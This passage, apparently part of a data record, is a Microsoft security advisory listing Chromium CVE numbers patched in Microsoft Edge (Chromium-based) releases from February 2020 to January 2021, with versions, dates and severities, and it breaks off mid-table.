"CVE-2020-6543", "CVE-2020-16014", "CVE-2020-6415", "CVE-2020-6539", "CVE-2020-6379", "CVE-2020-6466", "CVE-2020-6423", "CVE-2020-16003", "CVE-2020-16006", "CVE-2021-21115", "CVE-2020-16036", "CVE-2020-6515", "CVE-2021-21111", "CVE-2020-6551", "CVE-2020-6575", "CVE-2020-6488", "CVE-2020-6438", "CVE-2020-6552", "CVE-2020-6441", "CVE-2020-6443", "CVE-2020-6513", "CVE-2020-6380", "CVE-2020-6478", "CVE-2020-15977", "CVE-2021-21113", "CVE-2020-6480", "CVE-2020-6487", "CVE-2020-16013", "CVE-2020-6557", "CVE-2020-6556", "CVE-2020-6523", "CVE-2020-6558", "CVE-2020-16038", "CVE-2020-6505", "CVE-2020-16018", "CVE-2020-16025", "CVE-2020-6442", "CVE-2020-16037", "CVE-2021-21110", "CVE-2020-6404", "CVE-2020-6546", "CVE-2020-6526", "CVE-2020-15990", "CVE-2020-16015", "CVE-2020-6436", "CVE-2020-16028", "CVE-2020-6382", "CVE-2020-6490", "CVE-2020-6406", "CVE-2020-6553", "CVE-2020-6433", "CVE-2020-6402", "CVE-2020-6549", "CVE-2020-6418", "CVE-2020-6496", "CVE-2020-15981", "CVE-2020-6516", "CVE-2020-6450", "CVE-2020-6525", "CVE-2020-6562", "CVE-2020-15961", "CVE-2020-6430", "CVE-2020-6425", "CVE-2020-6527", "CVE-2020-0601", "CVE-2020-6541", "CVE-2020-6440", "CVE-2020-6405", "CVE-2020-6517", "CVE-2020-6384", "CVE-2020-6462", "CVE-2020-6378", "CVE-2020-6471", "CVE-2020-6393", "CVE-2020-6475", "CVE-2019-20503", "CVE-2020-16017", "CVE-2020-15988", "CVE-2020-6470", "CVE-2020-6524", "CVE-2020-6484", "CVE-2020-6531", "CVE-2020-6510", "CVE-2020-6544", "CVE-2020-6457", "CVE-2020-15992", "CVE-2020-15959", "CVE-2020-6495", "CVE-2020-6509"], "description": "**Please note:** Starting 1/21/2021, we will be releasing the Chrome CVEs that are included in the new releases of Microsoft Edge (Chromium-based) directly in the Security Update Guide. Please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>) for more information.\n\nThis advisory will be updated whenever Microsoft releases a version of Microsoft Edge (Chromium-based) which incorporates publicly disclosed security updates from the Chromium project. Microsoft will document separately any vulnerabilities in Microsoft Edge (Chromium-based), that are not in Chromium, under a Microsoft-assigned CVE number (see, for example: [CVE-2020-1341](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/cve-2020-1341>)).\n\n**History of Microsoft Edge (Chromium-based) Security Updates**\n\nMicrosoft Edge Version | Date Released | Based on Chromium Version | Highest Severity Fix in Release | CVEs \n---|---|---|---|--- \n87.0.664.75 | 1/7/2021 | 87.0.4280.141 | High | [CVE-2021-21106](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21106>), [CVE-2021-21107](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21107>), [CVE-2021-21108](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21108>), [CVE-2021-21109](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21109>), [CVE-2021-21110](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21110>), [CVE-2021-21111](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21111>), [CVE-2021-21112](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21112>), [CVE-2021-21113](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21113>), [CVE-2021-21114](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21114>), [CVE-2021-21115](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21115>), [CVE-2021-21116](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21116>), [CVE-2020-16043](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16043>), [CVE-2020-15995](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15995>) \n87.0.664.57 | 12/7/2020 | 87.0.4280.88 | High | [CVE-2020-16037](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16037>), [CVE-2020-16038](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16038>), [CVE-2020-16039](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16039>), [CVE-2020-16040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16040>), [CVE-2020-16041](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16041>), [CVE-2020-16042](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16042>) \n87.0.664.41 | 11/19/2020 | 87.0.4280.66 for Windows and Linux, 87.0.4280.67 for Mac | High | [CVE-2019-8075](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8075>), [CVE-2020-16012](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16012>), [CVE-2020-16014](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16014>), [CVE-2020-16015](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16015>), [CVE-2020-16018](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16018>), [CVE-2020-16022](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16022>), [CVE-2020-16023](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16023>), [CVE-2020-16024](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16024>), [CVE-2020-16025](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16025>), [CVE-2020-16026](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16026>), [CVE-2020-16027](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16027>), [CVE-2020-16028](<https://cve.mitre.org/ci-bin/cvename.cgi?name=CVE-2020-16028>), [CVE-2020-16029](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16029>), [CVE-2020-16030](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16030>), [CVE-2020-16031](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16031>), [CVE-2020-16032](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16032>), [CVE-2020-16033](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16033>), [CVE-2020-16034](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16034>), [CVE-2020-16036](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16036>) \n86.0.622.69 | 11/13/2020 | 86.0.4240.198 | High | [**CVE-2020-16013**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16013>) *, [**CVE-2020-16017**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16017>) * \n86.0.622.68 | 11/11/2020 | 86.0.4240.193 | High | [CVE-2020-16016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16016>) \n86.0.622.63 | 11/4/2020 | 86.0.4240.183 | High | [CVE-2020-16004](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16004>), [CVE-2020-16005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16005>), [CVE-2020-16006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16006>), [CVE-2020-16007](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16007>), [CVE-2020-16008](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16008>), [**CVE-2020-16009**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16009>) *, [CVE-2020-16011](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16011>) \n86.0.622.51 | 10/22/2020 | 86.0.4240.111 | High | [**CVE-2020-15999**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15999>) *, [CVE-2020-16000](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16000>), [CVE-2020-16001](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16001>), [CVE-2020-16002](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16002>), [CVE-2020-16003](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16003>) \n86.0.622.38 | 10/8/2020 | 86.0.4240.75 | High | [CVE-2020-6557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6557>), [CVE-2020-15968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15968>), [CVE-2020-15969](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15969>), [CVE-2020-15971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15971>), [CVE-2020-15972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15972>), [CVE-2020-15973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15973>), [CVE-2020-15974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15974>), [CVE-2020-15975](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15975>), [CVE-2020-15977](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15977>), [CVE-2020-15979](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15979>), [CVE-2020-15981](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15981>), [CVE-2020-15982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15982>), [CVE-2020-15985](<https://cve.mitre.org/cgi-bin/cvenamecgi?name=CVE-2020-15985>), [CVE-2020-15987](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15987>), [CVE-2020-15988](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15988>), [CVE-2020-15989](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15989>), [CVE-2020-15990](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15990>), [CVE-2020-15991](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15991>), [CVE-2020-15992](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15992>) \n85.0.564.63 | 9/23/2020 | 85.0.4183.121 | High | [CVE-2020-15960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15960>), [CVE-2020-15961](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15961>), [CVE-2020-15962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15962>), [CVE-2020-15963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15963>), [CVE-2020-15964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15964>), [CVE-2020-15965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15965>), [CVE-2020-15966](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15966>) \n85.0.564.51 | 9/9/2020 | 85.0.4183.102 | High | [CVE-2020-6574](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6574>), [CVE-2020-6575](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6575>), [CVE-2020-6576](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6576>), [CVE-2020-15959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15959>) \n85.0.564.41 | 8/27/2020 | 85.0.4183.83 | High | [CVE-2020-6558](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6558>), [CVE-2020-6559](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6559>), [CVE-2020-6560](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6560>), [CVE-2020-6561](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6561>), [CVE-2020-6562](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6562>), [CVE-2020-6563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6563>), [CVE-2020-6564](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6564>), [CVE-2020-6566](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6566>), [CVE-2020-6567](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6567>), [CVE-2020-6568](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6568>), [CVE-2020-6569](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6569>), [CVE-2020-6570](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6570>), [CVE-2020-6571](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6571>) \n84.0.522.63 | 8/20/2020 | 84.0.4147.135 | High | [CVE-2020-6556](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6556>) \n84.0.522.59 | 8/11/2020 | 84.0.4147.125 | High | [CVE-2020-6542](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6542>), [CVE-2020-6543](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6543>), [CVE-2020-6544](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6544>), [CVE-2020-6545](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6545>), [CVE-2020-6546](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6546>), [CVE-2020-6547](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6547>), [CVE-2020-6548](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6548>), [CVE-2020-6549](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6549>), [CVE-2020-6550](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6550>), [CVE-2020-6551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6551>), [CVE-2020-6552](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6552>), [CVE-2020-6553](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6553>), [CVE-2020-6554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6554>), [CVE-2020-6555](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6555>) \n84.0.522.49 | 7/30/2020 | 84.0.4147.105 | High | [CVE-2020-6532](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6532>), [CVE-2020-6537](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6537>), [CVE-2020-6538](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6538>), [CVE-2020-6539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6539>), [CVE-2020-6540](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6540>), [CVE-2020-6541](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6541>) \n84.0.522.40 | 7/16/2020 | 84.0.4147.89 | Critical | [CVE-2020-6510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6510>), [CVE-2020-6511](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6511>), [CVE-2020-6512](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6512>), [CVE-2020-6513](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6513>), [CVE-2020-6514](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6514>), [CVE-2020-6515](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6515>), [CVE-2020-6516](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6516>), [CVE-2020-6517](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6517>), [CVE-2020-6518](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6518>), [CVE-2020-6519](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6519>), [CVE-2020-6520](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6520>), [CVE-2020-6521](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6521>), [CVE-2020-6522](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6522>), [CVE-2020-6523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6523>), [CVE-2020-6524](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6524>), [CVE-2020-6525](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6525>), [CVE-2020-6526](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6526>), [CVE-2020-6527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6527>), [CVE-2020-6528](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6528>), [CVE-2020-6529](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6529>), [CVE-2020-6530](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6530>), [CVE-2020-6531](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6531>), [CVE-2020-6533](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6533>), [CVE-2020-6534](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6534>), [CVE-2020-6535](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6535>), [CVE-2020-6536](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6536>) \n83.0.478.56 | 6/24/2020 | 83.0.4103.116 | High | [CVE-2020-6509](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6509>) \n83.0.478.53 | 6/17/2020 | 83.0.4103.106 | High | [CVE-2020-6505](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6505>), [CVE-2020-6506](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6506>), [CVE-2020-6507](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6507>) \n83.0.478.45 | 6/4/2020 | 83.0.4103.97 | High | [CVE-2020-6493](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6493>), [CVE-2020-6494](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6494>), [CVE-2020-6495](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6495>), [CVE-2020-6496](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6496>) \n83.0.478.37 | 5/21/2020 | 83.0.4103.61 | High | [CVE-2020-6465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6465>), [CVE-2020-6466](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6466>), [CVE-2020-6467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6467>), [CVE-2020-6468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6468>), [CVE-2020-6469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6469>), [CVE-2020-6470](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6470>), [CVE-2020-6471](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6471>), [CVE-2020-6472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6472>), [CVE-2020-6473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6473>), [CVE-2020-6474](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6474>), [CVE-2020-6475](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6475>), [CVE-2020-6476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6476>), [CVE-2020-6478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6478>), [CVE-2020-6479](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6479>), [CVE-2020-6480](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6480>), [CVE-2020-6481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6481>), [CVE-2020-6482](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6482>), [CVE-2020-6483](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6483>), [CVE-2020-6484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6484>), [CVE-2020-6486](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6486>), [CVE-2020-6487](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6487>), [CVE-2020-6488](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6488>), [CVE-2020-6489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6489>), [CVE-2020-6490](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-640>) \n81.0.416.72 | 5/7/2020 | 81.0.4044.138 | High | [CVE-2020-6831](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6831>), [CVE-2020-6464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6464>) \n81.0.416.68 | 4/29/2020 | 81.0.4044.129 | High | [CVE-2020-6461](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6461>), [CVE-2020-6462](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6462>) \n81.0.416.64 | 4/23/2020 | 81.0.4044.122 | High | [CVE-2020-6458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6458>), [CVE-2020-6459](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6459>), [CVE-2020-6460](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6460>) \n81.0.416.58 | 4/17/2020 | 81.0.4044.113 | Critical | [CVE-2020-6457](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6457>) \n81.0.416.53 | 4/13/2020 | 81.0.4044.92 | High | [CVE-2020-6454](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6454>), [CVE-2020-6423](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6423>), [CVE-2020-6455](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6455>), [CVE-2020-6430](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6430>), [CVE-2020-6456](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6456>), [CVE-2020-6431](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6431>), [CVE-2020-6432](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6432>), [CVE-2020-6433](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6433>), [CVE-2020-6434](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6434>), [CVE-2020-6435](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6435>), [CVE-2020-6436](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6436>), [CVE-2020-6437](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6437>), [CVE-2020-6438](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6438>), [CVE-2020-6439](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6439>), [CVE-2020-6440](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6440>), [CVE-2020-6441](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6441>), [CVE-2020-6442](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6442>), [CVE-2020-6443](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6443>), [CVE-2020-6444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6444>), [CVE-2020-6445](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6445>), [CVE-2020-6446](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6446>), [CVE-2020-6447](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6447>), [CVE-2020-6448](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6448>) \n80.0.361.109 | 4/1/2020 | 80.0.3987.162 | High | [CVE-2020-6450](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6450>), [CVE-2020-6451](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6451>), [CVE-2020-6452](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6452>) \n80.0.361.69 | 3/19/2020 | 80.0.3987.149 | High | [CVE-2020-6422](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6422>), [CVE-2020-6424](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6424>), [CVE-2020-6425](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6425>), [CVE-2020-6426](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6426>), [CVE-2020-6427](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6427>), [CVE-2020-6428](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6428>), [CVE-2020-6429](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6429>), [CVE-2019-20503](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20503>), [CVE-2020-6449](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6449>) \n80.0.361.66 | 3/4/2020 | 80.0.3987.132 | High | [CVE-2020-6420](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6420>) \n80.0.361.62 | 2/25/2020 | 80.0.3987.122 | High | [CVE-2020-6407](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6407>), [**CVE-2020-6418**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6418>) * \n80.0.361.57 | 2/20/2020 | 80.0.3987.116 | High | [CVE-2020-6383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6383>), [CVE-2020-6384](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6384>), [CVE-2020-6386](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6386>) \n80.0.361.48 | 2/7/2020 | 80.0.3987.87 | High | [CVE-2020-6381](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6381>), [CVE-2020-6382](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6382>), [CVE-2019-18197](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18197>), [CVE-2019-19926](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19926>), [CVE-2020-6385](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6385>), [CVE-2019-19880](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19880>), [CVE-2019-19925](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19925>), [CVE-2020-6387](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6387>), [CVE-2020-6388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6388>), [CVE-2020-6389](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6389>), [CVE-2020-6390](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6390>), [CVE-2020-6391](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6391>), [CVE-2020-6392](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-202-6392>), [CVE-2020-6393](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6393>), [CVE-2020-6394](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6394>), [CVE-2020-6395](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6395>), [CVE-2020-6396](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6396>), [CVE-2020-6397](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6397>), [CVE-2020-6398](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6398>), [CVE-2020-6399](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6399>), [CVE-2020-6400](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6400>), [CVE-2020-6401](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6401>), 